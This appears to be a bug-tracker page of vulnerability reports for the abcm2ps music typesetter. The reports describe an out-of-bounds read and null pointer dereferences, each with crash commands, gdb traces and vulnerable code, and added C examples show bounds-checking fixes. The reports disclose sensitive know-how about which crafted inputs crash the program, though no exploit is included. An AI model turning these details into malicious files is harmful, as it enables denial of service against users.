$1 = (struct deco_elt *) 0x0
gef➤  p *de
$2 = {
  next = 0x5555557eb648, 
  prev = 0x5555557eb5d8, 
  s = 0x5555557e8390, 
  start = 0x0, 
  t = 0x4, 
  staff = 0x0, 
  flags = 0x0, 
  defl = 0x0, 
  m = 0xff, 
  x = 0, 
  y = 0, 
  dy = 0, 
  val = 0
}
gef➤  i r
rax            0x0	0x0
rbx            0x5555557eb610	0x5555557eb610
rcx            0x1f	0x1f
rdx            0x38	0x38
rsi            0x1f	0x1f
rdi            0x5555557eb610	0x5555557eb610
rbp            0x5555557e8390	0x5555557e8390
rsp            0x7fffffffd640	0x7fffffffd640
r8             0x5555557be7e8	0x5555557be7e8
r9             0x5555557eb5d8	0x5555557eb5d8
r10            0x0	0x0
r11            0x5555557e8130	0x5555557e8130
r12            0x5555557b4320	0x5555557b4320
r13            0x0	0x0

Reproducer file - Reproducer
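
Both this d_trill report and the d_cresc report above fail in the same way: a closing decoration reaches the drawing code with start == NULL, and the commented-out "end without start" branch in the d_cresc excerpt shows the error path that would have caught it. The code below is an added example written for this page, not abcm2ps code; the struct is a hypothetical cut-down of the deco_elt printed by gdb, and the ABC 2.1 convention that paired decorations are written !name(! and !name)! is assumed. It links each closing decoration to its opening one, reports the orphans, and shows the drawing-side lookup refusing to dereference a missing start.

```c
#include <stdio.h>
#include <string.h>

/* Cut-down decoration element modelled on the struct deco_elt shown in the gdb
 * output above (hypothetical layout: only the fields this example needs). */
struct deco_elt {
	const char *name;         /* decoration name without the '!', e.g. "crescendo)" */
	int x;                    /* stand-in for the x position of the symbol it sits on */
	struct deco_elt *start;   /* for a closing deco: its matching opening deco, or NULL */
};

/* ABC 2.1 writes paired decorations as !name(! ... !name)! (crescendo, diminuendo,
 * trill, ...). Returns 1 for an opening half, 2 for a closing half, 0 otherwise,
 * and stores the length of the common base name. */
static int paired_kind(const char *name, size_t *baselen)
{
	size_t n = strlen(name);

	if (n < 2)
		return 0;
	*baselen = n - 1;
	if (name[n - 1] == '(') return 1;
	if (name[n - 1] == ')') return 2;
	return 0;
}

/* Links every closing deco to the nearest earlier unmatched opening deco with the
 * same base name. Returns how many closings have no opening at all: these are the
 * "end without start" elements that the drawing code must not dereference. */
int link_deco_pairs(struct deco_elt *d, int n)
{
	int orphans = 0;

	for (int i = 0; i < n; i++) {
		size_t blen;

		d[i].start = NULL;
		if (paired_kind(d[i].name, &blen) != 2)
			continue;
		for (int j = i - 1; j >= 0; j--) {
			size_t jlen;
			int taken = 0;

			if (paired_kind(d[j].name, &jlen) != 1 || jlen != blen
			 || strncmp(d[j].name, d[i].name, blen) != 0)
				continue;
			for (int k = j + 1; k < i; k++)      /* already used by an earlier closing? */
				if (d[k].start == &d[j])
					taken = 1;
			if (taken)
				continue;
			d[i].start = &d[j];
			break;
		}
		if (!d[i].start) {
			orphans++;
			fprintf(stderr, "No start of deco !%s!\n", d[i].name);
		}
	}
	return orphans;
}

/* Drawing side, hardened: the x position where a hairpin begins is only computed
 * when the opening deco exists; an orphan is skipped instead of being dereferenced. */
int hairpin_start_x(const struct deco_elt *de, int *x)
{
	if (!de->start)
		return -1;
	*x = de->start->x + 3;      /* mirrors "x = s->x + 3" in the d_cresc excerpt */
	return 0;
}

int main(void)
{
	/* constructed sequence: two proper pairs and one crescendo end with no start */
	struct deco_elt d[] = {
		{ "crescendo(", 10, NULL }, { "trill(", 20, NULL }, { "crescendo)", 30, NULL },
		{ "trill)", 40, NULL },     { "crescendo)", 50, NULL },
	};
	int n = sizeof d / sizeof d[0];
	int orphans = link_deco_pairs(d, n);

	for (int i = 0; i < n; i++) {
		int x;
		if (hairpin_start_x(&d[i], &x) == 0)
			printf("!%s! at x=%d starts at x=%d\n", d[i].name, d[i].x, x);
	}
	printf("%d orphan end(s)\n", orphans);
	return 0;
}
```

Reporting the orphan at link time and keeping the NULL check in the drawing routine are both needed: the first gives the user a line to fix, the second keeps a fuzzed or hand-edited file from turning into a crash.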

out-of-bounds read vulnerability in the function calculate_beam()

An out-of-bounds read vulnerability was discovered in abcm2ps (8.14.1-master).

Tested environment : 64-bit ubuntu 16.04 LTS

Affected version : 8.14.1-master

Command -
./abcm2ps -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10

Vulnerable code :

if (s->nhd == 0)
	stem_err = min_tb[0][(unsigned) s->nflags];

Debug:

GDB :

Program received signal SIGSEGV, Segmentation fault.
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────[ registers ]────
$rax   : 0x5555557d7740      →  0x00005555557d79a0  →  0x00005555557d7bf0  →  0x00005555557d7e40  →  0x00005555557d80a0  →  0x00005555557d8300  →  0x00005555557d8558  →  0x00005555557d87b0
$rbx   : 0xffffffd0
$rcx   : 0x5555557d79a0      →  0x00005555557d7bf0  →  0x00005555557d7e40  →  0x00005555557d80a0  →  0x00005555557d8300  →  0x00005555557d8558  →  0x00005555557d87b0  →  0x00005555557d8a10
$rdx   : 0xffffffd0
$rsp   : 0x7fffffffdad0      →  0x0000004000000018
$rbp   : 0x5555557d7740      →  0x00005555557d79a0  →  0x00005555557d7bf0  →  0x00005555557d7e40  →  0x00005555557d80a0  →  0x00005555557d8300  →  0x00005555557d8558  →  0x00005555557d87b0
$rsi   : 0x0
$rdi   : 0x0
$rip   : 0x55555556b074      →  <calculate_beam+2580> movss xmm4, DWORD PTR [r15+rbx*4]
$r8    : 0x5555557c39a0      →  0x00005555557d6448  →  0x00005555557d66a0  →  0x00005555557d6900  →  0x00005555557d6b60  →  0x00005555557d6dc0  →  0x00005555557d7020  →  0x00005555557d7280
$r9    : 0x7fffffffdb50      →  0x0000000000000000
$r10   : 0x0
$r11   : 0x540
$r12   : 0x0
$r13   : 0x1
$r14   : 0x0
$r15   : 0x5555555a31c0      →  <min_tb+0> add BYTE PTR [rax], al
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$es: 0x0000  $gs: 0x0000  $cs: 0x0033  $fs: 0x0000  $ds: 0x0000  $ss: 0x002b
────────────────────────────────────────────────────[ stack ]────
0x00007fffffffdad0│+0x00: 0x0000004000000018     ← $rsp
0x00007fffffffdad8│+0x08: 0x0000000000000400
0x00007fffffffdae0│+0x10: 0x00000040557d66a0 ("f}U@"?)
0x00007fffffffdae8│+0x18: 0x0000000000000007
0x00007fffffffdaf0│+0x20: 0x0000000000000410
0x00007fffffffdaf8│+0x28: 0x00005555557d1208  →  0x0000000000000000
0x00007fffffffdb00│+0x30: 0x0000000000000430
0x00007fffffffdb08│+0x38: 0x0000000000000000
─────────────────────────────────────────[ code:i386:x86-64 ]────
   0x55555556b069 <calculate_beam+2569> test   dil, dil
   0x55555556b06c <calculate_beam+2572> jne    0x55555556b531 <calculate_beam+3793>
   0x55555556b072 <calculate_beam+2578> mov    ebx, edx
→ 0x55555556b074 <calculate_beam+2580> movss  xmm4, DWORD PTR [r15+rbx*4]
   0x55555556b07a <calculate_beam+2586> cmp    BYTE PTR [rax+0x58], 0x0
   0x55555556b07e <calculate_beam+2590> jle    0x55555556b558 <calculate_beam+3832>
   0x55555556b084 <calculate_beam+2596> movsx  edi, BYTE PTR [rax+rdi*1+0x3d]
   0x55555556b089 <calculate_beam+2601> cmp    dil, 0x1a
   0x55555556b08d <calculate_beam+2605> jle    0x55555556b09f <calculate_beam+2623>
────────────────────────────────────────────[ source:draw.c+353 ]────
    348                         }
    349                         x = s->voice == voice ? s->xs : s->x;
    350                         ys = a * x + b - staff_tb[s->staff].y;
    351                         if (s->voice == voice) {
    352                                 if (s->nhd == 0)
    353                                         stem_err = min_tb[0][(unsigned) s->nflags];
    354                                 else
    355                                         stem_err = min_tb[1][(unsigned) s->nflags];
    356                                 if (s->stem > 0) {
    357                                         if (s->pits[s->nhd] > 26) {
    358                                                 stem_err -= 2;
──────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────[ trace ]────
[#0] 0x55555556b074 → Name: calculate_beam(bm=0x7fffffffdb50, s1=0x5555557d7740)
[#1] 0x5555555719b8 → Name: draw_sym_near()
[#2] 0x555555582f7d → Name: delayed_output(indent=0)
[#3] 0x555555582f7d → Name: output_music()
[#4] 0x5555555886c1 → Name: generate()
[#5] 0x555555588c38 → Name: gen_ly(eob=0x0)
[#6] 0x55555558eab8 → Name: do_tune()
[#7] 0x555555560ce2 → Name: abc_parse(p=0x5555557ddbb0 "", fname=0x5555557f7f10 "POC", ln=0x16b)
[#8] 0x555555578c14 → Name: txt_add_eos(fname=0x5555557f7f10 "POC", linenum=0x16b)
[#9] 0x5555555790a4 → Name: frontend(s=<optimized out>, ftype=<optimized out>, fname=<optimized out>, linenum=<optimized out>)
─────────────────────────────────────────────────────────────────
0x000055555556b074 in calculate_beam (bm=bm@entry=0x7fffffffdb50, s1=s1@entry=0x5555557d7740) at draw.c:353
gef➤  p  min_tb
$377 = {{16, 16, 14, 12, 10, 10}, {14, 14, 10, 9, 9, 9}}
gef➤  p  min_tb[0][(unsigned) s->nflags]
$379 = 16
gef➤  p s->nflags
$381 = 0x1
gef➤  p/d s->nflags
$392 = -48
gef➤  i r
rax            0x5555557d7740   0x5555557d7740
rbx            0xffffffd0       0xffffffd0
rcx            0x5555557d79a0   0x5555557d79a0
rdx            0xffffffd0       0xffffffd0
rsi            0x0      0x0
rdi            0x0      0x0
rbp            0x5555557d7740   0x5555557d7740
rsp            0x7fffffffdad0   0x7fffffffdad0
r8             0x5555557c39a0   0x5555557c39a0
r9             0x7fffffffdb50   0x7fffffffdb50
r10            0x0      0x0
r11            0x540    0x540
r12            0x0      0x0
r13            0x1      0x1
r14            0x0      0x0
r15            0x5555555a31c0   0x5555555a31c0
rip            0x55555556b074   0x55555556b074 <calculate_beam+2580>
eflags         0x10246 [ PF ZF IF RF]
cs             0x33     0x33
ss             0x2b     0x2b
ds             0x0      0x0
es             0x0      0x0
fs             0x0      0x0
gs             0x0      0x0

Reproducer file - Reproducer
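Added example, not abcm2ps code: it models the expression min_tb[0][(unsigned) s->nflags] from the gdb frame above. The table contents are the ones printed by `p min_tb`; nflags is assumed to be a signed char (consistent with the movsx byte load in the disassembly and the -48 from `p/d s->nflags`); min_tb_lookup is a hypothetical hardened lookup, not the project's fix.

```c
/* Added example, not abcm2ps code. Models the expression
 * min_tb[0][(unsigned) s->nflags] from the draw.c:353 frame above: with
 * nflags == -48 the cast yields 0xffffffd0 (the value in rbx), so the read
 * lands far outside the 2x6 global table. */
#include <stdio.h>

#define NFLAGS_MAX 6   /* columns of min_tb, as printed by "p min_tb" */

/* Table contents copied from the gdb output on this page. */
static const int min_tb[2][NFLAGS_MAX] = {
    {16, 16, 14, 12, 10, 10},
    {14, 14, 10,  9,  9,  9},
};

/* The cast as written in the original expression. nflags is assumed to be a
 * signed char: it is promoted to int (-48) and then converted to unsigned,
 * which wraps to 4294967248 rather than producing a negative index. */
unsigned index_after_cast(signed char nflags)
{
    return (unsigned) nflags;
}

/* Hypothetical hardened lookup: validate the row and the input-derived flag
 * count before indexing. Returns the table value, or -1 when either index is
 * outside the table (every real entry is positive, so -1 is unambiguous). */
int min_tb_lookup(int row, signed char nflags)
{
    if (row < 0 || row > 1)
        return -1;
    if (nflags < 0 || nflags >= NFLAGS_MAX)
        return -1;
    return min_tb[row][(unsigned) nflags];   /* cast is now harmless: 0..5 */
}

int main(void)
{
    printf("(unsigned) -48        = %u\n", index_after_cast(-48));
    printf("min_tb_lookup(0, -48) = %d\n", min_tb_lookup(0, -48));
    printf("min_tb_lookup(1, 3)   = %d\n", min_tb_lookup(1, 3));
    return 0;
}
```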

Compile abcm2ps using Visual Studio 2015

Hello,

Not exactly an issue, but I am trying to compile abcm2ps using Visual Studio 2015 (the free Community Edition), and I receive hundreds of errors. Have you tried doing that? I don't even know where to start to fix it.

Thanks,
Claudius

Null pointer dereference vulnerability in the function show( )

A null pointer dereference vulnerability was discovered in abcm2ps (8.14.1-master). It can be triggered by sending a crafted abc file to the abcm2ps binary. It allows an attacker to cause a denial of service (segmentation fault) or possibly have unspecified other impact when a victim opens a specially crafted file.

Tested environment : 64-bit ubuntu 16.04 LTS

Affected version : 8.14.1-master

Command :
./abcm2ps -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10

Synopsis :
As per our research, we observed that the vulnerability exists in show(), located in file svg.c. The function user_ps_write gives user-defined PostScript sequences, then invokes the function svg_write, which writes the string length to the buffer and goes to ps_exec. When a crafted file is passed to the binary abcm2ps, in the function show(), which is triggered by ps_exec, at the condition if (stack->type == STR), we observed that stack is a structure and holds the value NULL, which triggered a null pointer dereference vulnerability.

Vulnerable code :

-> if (stack->type == STR) {
       s = pop_free_str();
       if (!s || s[0] != '(') {
           fprintf(stderr, "svg: No string\n");
           ps_error = 1;
           return;
       }
       p = s + 1;
   }

Debug:

GDB :

0x00000000004dbda8 in show (type=0x73) at svg.c:1697
1697            if (stack->type == STR) {
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]────
$rax   : 0x0               
$rbx   : 0x7fffffffcd60      →  0x0000000041b58ab3
$rcx   : 0x8               
$rdx   : 0x0               
$rsp   : 0x7fffffffcd20      →  0x000000000040647f  →  <main+7204> mov ecx, 0x0
$rbp   : 0x7fffffffcde0      →  0x00007fffffffd020  →  0x00007fffffffd280  →  0x00007fffffffd530  →  0x00007fffffffd570  →  0x00007fffffffd860  →  0x00007fffffffd870  →  0x00007fffffffd8b0
$rsi   : 0x755900            →  0x000000003f333333 ("333?"?)
$rdi   : 0x755888            →  0x0000000000000000
$rip   : 0x4dbda8            →  <show+425> movzx eax, BYTE PTR [rax+0x8]
$r8    : 0x800e2b18          →  0x0000000000000000
$r9    : 0x800e2b29          →  0x00f9f9f9f9f9f9f9
$r10   : 0x39a             
$r11   : 0x7ffff5a5ff90      →  0xfffda370fffda09f
$r12   : 0x7fffffffcdc0      →  0x00007fffffffcff0  →  0x00007fffffffd020  →  0x00007fffffffd280  →  0x00007fffffffd530  →  0x00007fffffffd570  →  0x00007fffffffd860  →  0x00007fffffffd870
$r13   : 0xffffffff9ac       →  0x0000000000000000
$r14   : 0x7fffffffcd60      →  0x0000000041b58ab3
$r15   : 0x7fffffffd5d0      →  0x0000000041b58ab3
$eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$es: 0x0000  $gs: 0x0000  $fs: 0x0000  $ds: 0x0000  $ss: 0x002b  $cs: 0x0033  
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]────
0x00007fffffffcd20│+0x00: 0x000000000040647f  →  <main+7204> mov ecx, 0x0     ← $rsp
0x00007fffffffcd28│+0x08: 0x00007f73f58eb830
0x00007fffffffcd30│+0x10: 0x0000000000000000
0x00007fffffffcd38│+0x18: 0x00000000f5a5973b  →  0x0000000000000000
0x00007fffffffcd40│+0x20: 0x0000000000000000
0x00007fffffffcd48│+0x28: 0x54fc41fbea02f700
0x00007fffffffcd50│+0x30: 0x0000000000000000
0x00007fffffffcd58│+0x38: 0x00007fffffffcff0  →  0x00007fffffffd020  →  0x00007fffffffd280  →  0x00007fffffffd530  →  0x00007fffffffd570  →  0x00007fffffffd860  →  0x00007fffffffd870
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]────
     0x4dbd9e <show+415>       je     0x4dbda8 <show+425>
     0x4dbda0 <show+417>       mov    rdi, rcx
     0x4dbda3 <show+420>       call   0x402e20 <__asan_report_load1@plt>
 →   0x4dbda8 <show+425>       movzx  eax, BYTE PTR [rax+0x8]
     0x4dbdac <show+429>       cmp    al, 0x1
     0x4dbdae <show+431>       jne    0x4dbe7a <show+635>
     0x4dbdb4 <show+437>       call   0x4d7f1b <pop_free_str>
     0x4dbdb9 <show+442>       mov    QWORD PTR [rbp-0x98], rax
     0x4dbdc0 <show+449>       cmp    QWORD PTR [rbp-0x98], 0x0
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:svg.c+1697 ]────
   1692             p = tmp;
   1693             tmp[0] = '\0';
   1694             s = NULL;
   1695             break;
   1696         default:
        // type=0x73
 → 1697             if (stack->type == STR) {
   1698                 s = pop_free_str();
   1699                 if (!s || s[0] != '(') {
   1700                     fprintf(stderr, "svg: No string\n");
   1701                     ps_error = 1;
   1702                     return;
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0x4dbda8 → Name: show(type=0x73)
[#1] 0x4e13d9 → Name: ps_exec(op=0x6230000014c8 "gcshow")
[#2] 0x4eb574 → Name: svg_write(buf=0x623000000109 "/octava{\t% usage: w x y octava\n\texch -10 add exch 2 copy\n\tM 0 10 RM /Times-Roman 16 selectfont(8)show\n\t/Times-Roman 12 selectfont(va)show\n\tM 0 6 RL currentpoint stroke M\n\t[6] 0 setdash 30 add 0 RL currentpoint stroke M\n\t[] 0 setdash 0 -6 RL stroke}!\n/octavab{\t% usage: w x y octavab\n\texch -14 add exch 2 copy \n\tM 0 2 RM /Times-Roman 16 selectfont(8)show\n\t/Times-Roman 12 selectfont(va basso)show\n\t22 add M 0 -6 RL currentpoint stroke M\n\t[6] 0 setdash 30 add 0 RL stroke\n\t[] 0 setdash}!\n/bigl{\t\t% usage: str x y bigl\n\t/Times-Bold 26 selectfont\n\t4 add M showc\n\t1 SLW 1 -2 RM \n\t0 22 RL -22 0 RL\n\t0 -22 RL 22 0 RL stroke}!\n/biglc{\t\t% usage: str x y biglc\n\t2 copy 5 2 roll /Times-Bold 22 selectfont\n\t6 add M showc\n\t1 SLW 13 add newpath\n\t12 0 360 arc stroke}!\n/ped{\t\t% usage: str x y ped\n\tgsave 4 add exch -10 add exch T 26 dup scale\n\t0.368 0.074 moveto\n\t0.341 0.121 0.335 0.147 0.371 0.203 curveto\n\t0.435 0.289 0.531 0.243 0.488 0.155 curveto\n\t0.472 0.117 0.434 0.096 0.414 0.080 curveto\n\t0.429 0.038 0.494 -0.006 0.541 0.075 curveto\n\t0.559 0.123 0.558 0.224 0.663 0.252 curveto\n\t0.603 0.354 0.449 0.393 0.461 0.405 curveto\n\t0.902 0.262 0.705 -0.124 0.555 0.046 curveto\n\t0.488 -0.032 0.417 0.021 0.389 0.055 curveto\n\t0.303 -0.018 0.303 -0.020 0.248 0.040 curveto\n\t0.218 0.108 0.191 0.062 0.164 0.047 curveto\n\t0.010 -0.056 0.032 0.019 0.124 0.062 curveto\n\t0.229 0.117 0.200 0.091 0.228 0.195 curveto\n\t0.240 0.241 0.149 0.250 0.166 0.311 curveto\n\t0.207 0.493 lineto\n\t-0.041 0.441 0.049 0.261 0.126 0.387 curveto\n\t0.138 0.381 lineto\n\t-0.020 0.119 -0.100 0.472 0.220 0.507 curveto\n\t0.548 0.486 0.399 0.171 0.254 0.374 curveto\n\t0.264 0.384 lineto\n\t0.338 0.259 0.521 0.449 0.228 0.488 curveto\n\t0.198 0.356 lineto\n\t0.181 0.304 0.273 0.294 0.262 0.241 curveto\n\t0.229 0.101 lineto\n\t0.273 0.070 0.282 -0.038 0.368 0.074 curveto\n\t0.391 0.094 
moveto\n\t0.456 0.130 0.476 0.171 0.468 0.213 curveto\n\t0.452 0.276 0.333 0.171 0.391 0.094 curveto\n\t0.627 0.019 moveto\n\t0.533 0.041 0.586 0.228 0.678 0.229 curveto\n\t0.729 0.170 0.712 0.025 0.627 0.019 curveto\n\teofill\n\t0.8 0.04 0.04 0 360 newpath arc fill\n\tpop grestore}!\n/pedoff{\t% usage: str x y pedoff\n\tgsave 4 add exch -5 add exch T 26 dup scale\n\t0.219 0.198 moveto\n\t0.231 0.172 0.195 0.138 0.162 0.173 curveto\n\t0.149 0.219 0.206 0.231 0.219 0.198 curveto\n\t0.144 0.242 moveto\n\t0.166 0.223 0.193 0.230 0.181 0.267 curveto\n\t0.178 0.306 0.144 0.302 0.151 0.335 curveto\n\t0.160 0.381 0.225 0.377 0.224 0.330 curveto\n\t0.228 0.302 0.198 0.306 0.197 0.267 curveto\n\t0.194 0.237 0.213 0.222 0.237 0.247 curveto\n\t0.263 0.276 0.234 0.297 0.268 0.322 curveto\n\t0.314 0.347 0.354 0.297 0.316 0.259 curveto\n\t0.296 0.237 0.273 0.266 0.246 0.237 curveto\n\t0.223 0.217 0.232 0.194 0.266 0.197 curveto\n\t0.303 0.202 0.302 0.232 0.332 0.228 curveto\n\t0.381 0.232 0.388 0.156 0.332 0.152 curveto\n\t0.302 0.148 0.302 0.185 0.266 0.183 curveto\n\t0.231 0.186 0.228 0.169 0.245 0.143 curveto\n\t0.273 0.116 0.297 0.141 0.316 0.117 curveto\n\t0.350 0.075 0.303 0.029 0.258 0.062 curveto\n\t0.237 0.082 0.261 0.102 0.233 0.133 curveto\n\t0.212 0.151 0.194 0.147 0.197 0.113 curveto\n\t0.203 0.075 0.232 0.075 0.230 0.043 curveto\n\t0.223 -0.004 0.159 -0.002 0.152 0.042 curveto\n\t0.148 0.075 0.185 0.076 0.183 0.113 curveto\n\t0.183 0.147 0.163 0.150 0.141 0.133 curveto\n\t0.113 0.104 0.140 0.079 0.113 0.059 curveto\n\t0.069 0.037 0.033 0.077 0.063 0.117 curveto\n\t0.082 0.141 0.104 0.117 0.132 0.142 curveto\n\t0.153 0.163 0.144 0.188 0.113 0.182 curveto\n\t0.073 0.182 0.075 0.147 0.046 0.152 curveto\n\t-0.003 0.152 -0.003 0.227 0.048 0.227 curveto\n\t0.075 0.231 0.075 0.198 0.113 0.196 curveto\n\t0.141 0.197 0.147 0.207 0.133 0.237 curveto\n\t0.102 0.264 0.082 0.237 0.062 0.261 curveto\n\t0.028 0.302 0.077 0.347 0.118 0.318 curveto\n\t0.138 0.297 0.116 0.275 0.144 
0.242 curveto\n\tfill pop grestore}!\n/glissup{\t% usage: x y glissup\n\tgsave T 5 0 T\n\t25 rotate 10 0 T 0 0 M\n\t0 8 8{\n\t\t2 -1.15 2.30 150 30 arcn 4 0 T\n\t\t2 1.15 2.30 -150 -30 arc 4 0 T pop\n\t}for\n\t1 SLW stroke grestore}!\n/tr3{\t\t% usage: x y tr3 - mordent with 3 peeks\n\tM 2.2 2.2 RL 2.1 -2.9 RL 0.7 0.7 RL\n\t2.2 2.2 RL 2.1 -2.9 RL 0.7 0.7 RL\n\t2.2 2.2 RL 2.1 -2.9 RL 0.7 0.7 RL\n\t-2.2 -2.2 RL -2.1 2.9 RL -0.7 -0.7 RL\n\t-2.2 -2.2 RL -2.1 2.9 RL -0.7 -0.7 RL\n\t-2.2 -2.2 RL -2.1 2.9 RL -0.7 -0.7 RL fill}!\n/t2ub{\t\t% usage: x y t2ub - mordent ending with an upper bar\n\t2 copy umrd 0.6 SLW\n\tM 5 4 RM 0 6 RL stroke}!\n/t3tab{\t\t% usage: x y t3tab - mordent + upper turn and bar\n\t4 add 2 copy exch 7.5 sub exch tr3 exch 7.5 add exch\n\t2 copy 0.6 SLW M 2 6 14 6 16 0 RC\n\tM 8 1 RM 0 6 RL stroke}!\n/ubt3ta{\t% usage: x y ubt3ta - up bar + mordent + upper turn\n\t4 add 2 copy 0.6 SLW\n\tM -7.5 0 RM 0 6 RL stroke\n\t2 copy exch 7.5 sub exch tr3\n\tM 7.5 0 RM 2 6 14 6 16 0 RC stroke}!\n/tbt3{\t\t% usage: x y tbt3 - low turn + long mordent\n\texch 10 sub exch 6 add 2 copy 0.6 SLW\n\tM -8 0 RM 2 -6 14 -6 16 0 RC stroke\n\texch 8 add exch tr3}!\n/t2ta{\t\t% usage: x y t2ta - mordent + upper turn\n\t2 copy umrd\n\tM 5 4 RM 1 5 9 5 10 0 RC stroke}!\n/t3b{\t\t% usage: x y t3b - upper + lower mordent\n\t2 copy exch -7.5 add exch 4 add tr3 0.6 SLW\n\tM 2.5 0 RM 0 8 RL stroke}!\n gcshow", len=0x6c7)
[#3] 0x4d697d → Name: user_ps_write()
[#4] 0x41c747 → Name: init_page()
[#5] 0x41e58a → Name: write_buffer()
[#6] 0x4200c8 → Name: check_buffer()
[#7] 0x49a25c → Name: output_music()
[#8] 0x4a1368 → Name: generate()
[#9] 0x4a16eb → Name: gen_ly(eob=0x0)
gef➤  p stack
$1 = (struct elt_s *) 0x0
gef➤  p *stack
Cannot access memory at address 0x0

Reproducer file - Reproducer

Null pointer dereference vulnerability in the function ps_exec()

A null pointer dereference vulnerability was discovered in abcm2ps (8.14.1-master).

Tested environment : 64-bit ubuntu 16.04 LTS

Affected version : 8.14.1-master

Command :
./abcm2ps -E -g -x -v -O fff -O = -i -k 1 POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10

Vulnerable code :

if (gcur.font_s != h || strcmp(fontnames[n], gcur.font_n) != 0) {
    free(gcur.font_n_old);
    gcur.font_n_old = gcur.font_n;
    gcur.font_n = strdup(fontnames[n]);
    gcur.font_s = h;
}
return;

Debug:

GDB :

Program received signal SIGSEGV, Segmentation fault.
[ Legend: Modified register | Code | Heap | Stack | String]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]────
$rax   : 0x0
$rbx   : 0x5555557c3880      →  0x00005555557ddb30  →  "sans-serif"
$rcx   : 0x0
$rdx   : 0x5555557d1010      →  0x0001000100000102
$rsp   : 0x7fffffffd6d8      →  0x00007ffff76e39ae  →  <strdup+14> lea rbx, [rax+0x1]
$rbp   : 0x0
$rsi   : 0x5555557d1010      →  0x0001000100000102
$rdi   : 0x0
$rip   : 0x7ffff76f7646      →  <__strlen_sse2+38> movdqu xmm4, XMMWORD PTR [rax]
$r8    : 0x0
$r9    : 0x0
$r10   : 0x7ffff77e4cc0      →  0x0002000200020002
$r11   : 0x5555555a6c41      →   add BYTE PTR [rsi+0x61], ah
$r12   : 0x5555557d13dd      →  0x006864726f636361 ("accordh"?)
$r13   : 0x5555557d13e4      →  0x2e383232297c2800
$r14   : 0x61
$r15   : 0xa
$eflags: [zero CARRY parity ADJUST SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$ds: 0x0000  $cs: 0x0033  $ss: 0x002b  $fs: 0x0000  $gs: 0x0000  $es: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]────
0x00007fffffffd6d8│+0x00: 0x00007ffff76e39ae → <strdup+14> lea rbx, [rax+0x1] ← $rsp
0x00007fffffffd6e0│+0x08: 0x00005555557d13e4 → 0x2e383232297c2800
0x00007fffffffd6e8│+0x10: 0x00005555557c3880 → 0x00005555557ddb30 → "sans-serif"
0x00007fffffffd6f0│+0x18: 0x0000000000000000
0x00007fffffffd6f8│+0x20: 0x00005555555959da → <ps_exec+890> movss xmm0, DWORD PTR [rsp]
0x00007fffffffd700│+0x28: 0x0000000000000000
0x00007fffffffd708│+0x30: 0x0000007743bd0000
0x00007fffffffd710│+0x38: 0x0000005b0000006e ("n"?)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]────
   0x7ffff76f7636 <__strlen_sse2+22> and    rcx, 0xfff
   0x7ffff76f763d <__strlen_sse2+29> cmp    rcx, 0xfcf
   0x7ffff76f7644 <__strlen_sse2+36> ja     0x7ffff76f76b0 <__strlen_sse2+144>
→ 0x7ffff76f7646 <__strlen_sse2+38> movdqu xmm4, XMMWORD PTR [rax]
   0x7ffff76f764a <__strlen_sse2+42> pcmpeqb xmm4, xmm0
   0x7ffff76f764e <__strlen_sse2+46> pmovmskb edx, xmm4
   0x7ffff76f7652 <__strlen_sse2+50> test   edx, edx
   0x7ffff76f7654 <__strlen_sse2+52> je     0x7ffff76f765a <__strlen_sse2+58>
   0x7ffff76f7656 <__strlen_sse2+54> bsf    eax, edx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0x7ffff76f7646 → Name: __strlen_sse2()
[#1] 0x7ffff76e39ae → Name: __GI___strdup(s=0x0)
[#2] 0x5555555959da → Name: ps_exec(op=<optimized out>)
[#3] 0x55555559f609 → Name: seq_exec(e=<optimized out>)
[#4] 0x555555595719 → Name: ps_exec(op=0x5555557d13dd "accordh")
